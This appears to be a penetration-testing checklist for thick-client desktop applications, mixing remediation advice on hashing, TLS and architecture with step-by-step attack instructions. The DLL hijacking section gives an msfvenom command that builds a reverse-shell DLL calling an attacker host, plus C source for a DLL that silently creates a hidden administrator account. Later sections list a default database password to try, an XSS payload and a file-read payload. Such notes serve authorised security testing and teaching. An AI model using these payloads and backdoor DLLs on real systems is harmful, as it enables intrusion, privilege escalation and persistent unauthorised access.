- DLL Hijacking
- Insecure application design
- Weak Hashing Algorithms
- Cleartext secrets in memory
- Hardcoded secrets
- Unsigned binaries
- Lack of verification of the server certificate
- Insecure SSL/TLS configuration
- Remote Code Execution via Citrix Escape
- Direct database access
- Insecure Windows Service permissions
- Code injection
- Windows persistence
Tool
- Process Monitor to see which DLLs are missing for an exe and do DLL Hijacking
Process
- Use winPEAS to enumerate non-Windows services:
.\winPEASany.exe quiet servicesinfo - Enumerate which of these services our user has stop and start access to
.\accesschk.exe /accepteula -uvqc user <service> - Once it's found wich service is vulnerable to dll hijacking, find the executable's path with
sc qc dllsvc - Using Process Monitor, add these the filters to find missing dlls.
- Generate a reverse shell DLL named hijackme.dll:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f dll -o hijackme.dll - Run again the vulnerable service:
net stop <service>andnet start dllsvc
Another example of a dll:
#include <windows.h>
BOOL APIENTRY DllMain(HMODULE hModule, DWORD dwReason, LPVOID lpReserved) {
switch (dwReason) {
case DLL_PROCESS_ATTACH:
// Perform initialization tasks for the DLL when it is loaded
int i;
i = system ("net user eviladmin Ev!lpass /add");
i = system ("net localgroup administrators eviladmin /add");
break;
case DLL_PROCESS_DETACH:
// Perform cleanup tasks for the DLL when it is unloaded
break;
case DLL_THREAD_ATTACH:
// Perform initialization tasks for each new thread that loads the DLL
break;
case DLL_THREAD_DETACH:
// Perform cleanup tasks for each thread that unloads the DLL
break;
}
return TRUE;
}x86_64-w64-mingw32-gcc dllh.cpp --shared -o dllh.dll
Resources
The application design is based on a two-tier architecture. In particular, the thick client application installed on the workstation communicates directly with a backend DBMS without the use of an application server.
The best option, from a security perspective, is designing and implementing a three-tier architecture in which the thick client connects with an intermediary layer (an application server), which in turn communicates with the database. A secure channel must be used for all communications, with only secure protocols (such TLS, HTTPS, etc.), and preferebli with Certificate Pinning.
If this is not possible, it is desirable to provide read-only users and read/write users distinct privileges at the DBMS layer. This would stop vertical privilege escalation even if a read-only user were to access the database directly and try to edit the data.
Sensitive data exposure, key leakage, broken authentication, insecure sessions, and spoofing attacks can all be caused by improper application of encryption methods. Some hashing or encryption techniques, such MD5 and RC4, are known to be insecure and are not advised for use.
When dealing with hashing algorithms, the strongest algorithm available should be used (e.g., SHA-512 or at least SHA-256). However, it is always crucial to take into account the precise context in which the hashing algorithm must be used. For instance, it is recommended to utilize contemporary hashing algorithms that have been created especially for securely saving passwords when managing passwords. This indicates that they should be slow (as opposed to fast algorithms like MD5 and SHA-1), and that can be configured by changing the work factor (e.g., PBKDF2 or Bcrypt)
If not configured correctly, the encryption can be not sufficiently secure. An example with AES, an algorithm for symmetric encryption:
- Cipher-Block-Chaining (CBC) is no longer considered safe when verifiable padding has been applied without first ensuring the integrity of the ciphertext, except for very specific circumstances. If implemented, it can weakens AES encryption.
The memory analysis of an application, done when the thick client process is running, can highlight the presence of secrets in cleartext and that can be therefore extracted by any user having access to the machine where the application is hosted.
Resource
- Process Hacker It helps to dump the exe memory and see what sensitive data is there
Sometimes, the thick client application's source code is not obfuscated, therefore a hostile user may decompile it and easily comprehend every functionality of the application. It's also possible that more can be found, like credentials and api keys.
Resources
- VB Decompiler decompile a VB application
- ILSpy | dnSpy .NET decompilers
If an application executable, and/or the imported DLLs, has not been digitally signed, it's possible replace it with a tampered version without the user noticing.
Resource
- Sigcheck check the signature of an executable
Due to the fact that the client does not verify the TLS certificate presented by the back-end, it's possible to intercept also HTTPS communications managed by the thick client application.
Without effective certificate control, an attacker who is capable of conducting a Man in the Middle attack can provide a self-signed certificate and the application will accept it, invalidating the protection provided by the TLS connection.
During the SSL/TLS negotiation, SSL/TLS connections may be set up to offer outdated protocols and cipher suites that are susceptible to known security flaws. The data transmitted between the server and the client could potentially be read or modified in this case if an attacker is able to intercept the communication.
Resource
- testssl.sh useful for checking outdated ciphers & more
If Citrix is present and you have access to it, there are multiple ways you can achieve Remote Code Execution:
- Try to upload a PowerShell
- Search for a functionality that opens a dialog box. Insert the path for
cmdandPowerShelland see if they pop-up - In a dialog box, see if the right-click is allowed. Play with the functionality to achieve RCE, like creating a
.batand running it or upload files - Upload Process Hacker and see if you find Cleartext secrets in memory
Resources
- If it's found that standard users have direct access to the database, there is the possibility for users to read and write data that is not otherwise accessible through the client application.
- If the SQL server requires a Windows User access, use the command
runas /user:localadmin <SQL-SERVER-MANAGEMENT-STUDIO> - Try access with the account
sa:RPSsql12345 - Intercept the requests and see if there is an Insecure application design. In that case, it might be possible to perform a Direct database access, SQLi or Remote Code Execution
Resources
Windows service executable might be configured with insecure permissions. Services configured to use an executable with weak permissions are vulnerable to privilege escalation attacks.
Unprivileged users have the ability to change or replace the executable with arbitrary code, which would then be run the following time the service is launched. This can lead to privilege escalation depending on the user the service is running as.
- Check for classic HTML injections and XSS
- Try to use a
SSIDas a vector for an XSS with a payload like"/><img src=x onerror=alert(1)>
- Try to use a
- Check if
<webview>works. If it does, it's might be possible to achieve a LFI with a payload like this<webview src="file:///etc/passwd"></webview>. [Reference]
Resources